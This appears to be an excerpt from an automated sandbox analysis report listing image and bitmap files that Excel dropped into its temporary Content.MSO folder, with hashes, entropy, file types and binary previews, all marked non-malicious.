                  SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                  SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3469E5BD.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):33795
                  Entropy (8bit):7.909466841535462
                  Encrypted:false
                  SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                  MD5:613C306C3CC7C3367595D71BEECD5DE4
                  SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                  SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                  SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39CC72E1.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                  Category:dropped
                  Size (bytes):8815
                  Entropy (8bit):7.944898651451431
                  Encrypted:false
                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                  MD5:F06432656347B7042C803FE58F4043E1
                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A88E756.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                  Category:dropped
                  Size (bytes):14198
                  Entropy (8bit):7.916688725116637
                  Encrypted:false
                  SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                  MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                  SHA1:72CA86D260330FC32246D28349C07933E427065D
                  SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                  SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                  Malicious:false
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\438FC3C5.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):33795
                  Entropy (8bit):7.909466841535462
                  Encrypted:false
                  SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                  MD5:613C306C3CC7C3367595D71BEECD5DE4
                  SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                  SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                  SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                  Malicious:false
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48F669AC.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):6815
                  Entropy (8bit):7.871668067811304
                  Encrypted:false
                  SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                  MD5:E2267BEF7933F02C009EAEFC464EB83D
                  SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                  SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                  SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                  Malicious:false
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A5EF89A.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                  Category:dropped
                  Size (bytes):7006
                  Entropy (8bit):7.000232770071406
                  Encrypted:false
                  SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                  MD5:971312D4A6C9BE9B496160215FE59C19
                  SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                  SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                  SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                  Malicious:false
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F6D3C08.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                  Category:dropped
                  Size (bytes):85020
                  Entropy (8bit):7.2472785111025875
                  Encrypted:false
                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                  Malicious:false
                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85D16660.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                  Category:dropped
                  Size (bytes):85020
                  Entropy (8bit):7.2472785111025875
                  Encrypted:false
                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                  Malicious:false
                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D207B6E.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                  Category:dropped
                  Size (bytes):14198
                  Entropy (8bit):7.916688725116637
                  Encrypted:false
                  SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                  MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                  SHA1:72CA86D260330FC32246D28349C07933E427065D
                  SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                  SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                  Malicious:false
                  Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC4B86A.emf
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):648132
                  Entropy (8bit):2.8123732035585567
                  Encrypted:false
                  SSDEEP:3072:s34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:e4UcLe0JOcXuunhqcS
                  MD5:BA69715E6EB54DCEED5B1507537588A9
                  SHA1:87833A16EC09B976C107F225E66B68B52E6A40A6
                  SHA-256:9D7AA7153D914458F4FB697A092F57D6725C1FDBC5086991DF200642355211AE
                  SHA-512:A726ED7A59CE51C6BF9ADED36634FDE236C40B3F414165B7FADE0AEBF172F50D7A17F273F572EF5BADFC24DFFC91D9C33EAACA7380E632BC04CB6F555E068B92
                  Malicious:false
                  Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Z$...p...f.Z.@..%...L............t..RQt[..........\.....$Qt[...... ...Id.Z...... .........'..d.Z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...... ...8.Z......'.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA746F1B.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):84203
                  Entropy (8bit):7.979766688932294
                  Encrypted:false
                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                  Malicious:false
                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D48A6F02.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                  Category:dropped
                  Size (bytes):7006
                  Entropy (8bit):7.000232770071406
                  Encrypted:false
                  SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                  MD5:971312D4A6C9BE9B496160215FE59C19
                  SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                  SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                  SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                  Malicious:false
                  Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB3F3C69.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                  Category:dropped
                  Size (bytes):8815
                  Entropy (8bit):7.944898651451431
                  Encrypted:false
                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                  MD5:F06432656347B7042C803FE58F4043E1
                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                  Malicious:false
                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4E9FBD3.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):84203
                  Entropy (8bit):7.979766688932294
                  Encrypted:false
                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                  Malicious:false
                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9921897.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):49744
                  Entropy (8bit):7.99056926749243
                  Encrypted:true
                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                  Malicious:false
                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4138.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4167.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4168.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF0B5.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF0B6.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
